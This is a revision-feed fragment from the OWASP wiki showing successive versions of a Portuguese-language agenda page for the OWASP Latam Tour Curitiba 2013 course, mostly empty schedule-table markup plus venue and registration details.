| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 14:45 - 15:30&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 15:30 - 16:15&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 16:15 - 16:45&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 16:45 - 17:45&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 17:45 - 18:00&lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=LatamTour2013_CUR_Agenda&amp;diff=146274</id>
		<title>LatamTour2013 CUR Agenda</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=LatamTour2013_CUR_Agenda&amp;diff=146274"/>
				<updated>2013-03-01T12:43:43Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;noinclude&amp;gt;{{:LatamTour2013 header}}&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; height=&amp;quot;30&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot;       | '''CURSO''' &lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot;                   | '''OWASP Latam Tour Curitiba 2013''' &lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;center&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;2&amp;quot;             | '''Descrição e Objetivo'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;left&amp;quot; height=&amp;quot;80&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; colspan=&amp;quot;2&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
* Além do OWASP Top 10, a maioria dos [[:Category:OWASP_Project|Projetos OWASP]] não são amplamente utilizados nos ambientes corporativos. Na maioria dos casos isso não é devido a falta de qualidade nos projetos ou documentação disponível, mas sim aonde se encaixariam em um Ecosistema de Segurança de Aplicações empresarial. &lt;br /&gt;
&lt;br /&gt;
* Este curso tem como objetivo mudar essa situação proporcionando uma explicação sobre os projetos mais maduros do OWASP.&lt;br /&gt;
&lt;br /&gt;
* Se você tem interesse em participar da parte 'hands-on' do curso, por favor traga um laptop.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Data''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | 25 e 26 de Março&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | UP - Universidade Positivo - Rua Professor Pedro Viriato Parigot de Souza, 5.300 - Campo Comprido - Ctba - PR - Fone: (41) 3317-3000&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | '''Valor e Inscrição'''&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | http://www.regonline.com/Register/Checkin.aspx?EventID=1207610&lt;br /&gt;
 &lt;br /&gt;
|} &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:100%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;40&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;6&amp;quot; | '''GRADE DE PALESTRAS'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Horário''' &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Assunto'''&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Palestrante'''&lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Detalhes'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 14:00 – 14:40 &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 14:40 – 15:20 &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 15:20 – 16:00 &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 16:00 – 16:20 &lt;br /&gt;
| style=&amp;quot;width:90%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#E3E3E3&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 16:20 – 17:00 &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 17:00 – 17:40 &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 17:40 – 18:20 &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 18:20 – 19:00 &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 19:00 – 19:20 &lt;br /&gt;
| style=&amp;quot;width:90%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#E3E3E3&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 19:20 – 20:00 &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 20:00 – 20:40 &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 20:40 – 21:20 &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
| style=&amp;quot;width:40%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; |&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | 21:20 – 21:30 &lt;br /&gt;
| style=&amp;quot;width:90%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#E3E3E3&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | &lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Wagner.elias</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=LatamTour2013_CUR_Agenda&amp;diff=145783</id>
		<title>LatamTour2013 CUR Agenda</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=LatamTour2013_CUR_Agenda&amp;diff=145783"/>
				<updated>2013-02-25T14:28:29Z</updated>
		
		<summary type="html">&lt;p&gt;Wagner.elias: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;noinclude&amp;gt;{{:LatamTour2013 header}}&amp;lt;/noinclude&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; height=&amp;quot;30&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot;       | '''CURSO''' &lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#EEEEEE;&amp;quot; colspan=&amp;quot;2&amp;quot;                   | '''OWASP Latam Tour Curitiba 2013''' &lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;center&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;2&amp;quot;             | '''Descrição e Objetivo'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;left&amp;quot; height=&amp;quot;80&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; colspan=&amp;quot;2&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
* Além do OWASP Top 10, a maioria dos [[:Category:OWASP_Project|Projetos OWASP]] não são amplamente utilizados nos ambientes corporativos. Na maioria dos casos isso não é devido a falta de qualidade nos projetos ou documentação disponível, mas sim aonde se encaixariam em um Ecosistema de Segurança de Aplicações empresarial. &lt;br /&gt;
&lt;br /&gt;
* Este curso tem como objetivo mudar essa situação proporcionando uma explicação sobre os projetos mais maduros do OWASP.&lt;br /&gt;
&lt;br /&gt;
* Se você tem interesse em participar da parte 'hands-on' do curso, por favor traga um laptop.&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:20%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Data''' &lt;br /&gt;
| style=&amp;quot;width:80%&amp;quot; valign=&amp;quot;middle&amp;quot;  bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Lugar'''&lt;br /&gt;
|-&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;center&amp;quot; | 25 e 26 de Março&lt;br /&gt;
| valign=&amp;quot;middle&amp;quot; bgcolor=&amp;quot;#EEEEEE&amp;quot; align=&amp;quot;left&amp;quot; | UP - Universidade Positivo - Rua Professor Pedro Viriato Parigot de Souza, 5.300 - Campo Comprido - Ctba - PR - Fone: (41) 3317-3000&lt;br /&gt;
&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | '''Valor e Inscrição'''&lt;br /&gt;
|-&lt;br /&gt;
| align=&amp;quot;center&amp;quot; style=&amp;quot;background:#CCCCEE;&amp;quot; colspan=&amp;quot;2&amp;quot; | Registration Coming Soon&lt;br /&gt;
 &lt;br /&gt;
|} &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
{|style=&amp;quot;vertical-align:top;width:90%;background-color:#white;padding:10px;border:1px solid silver;&amp;quot; align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;5&amp;quot;&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:100%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;40&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;6&amp;quot; | '''GRADE DE PALESTRAS'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;width:10%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Horário''' &lt;br /&gt;
| style=&amp;quot;width:27%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Assunto'''&lt;br /&gt;
| style=&amp;quot;width:23%&amp;quot; valign=&amp;quot;middle&amp;quot; height=&amp;quot;30&amp;quot; bgcolor=&amp;quot;#CCCCEE&amp;quot; align=&amp;quot;center&amp;quot; colspan=&amp;quot;0&amp;quot; | '''Palestrante'''&lt;br /&gt;
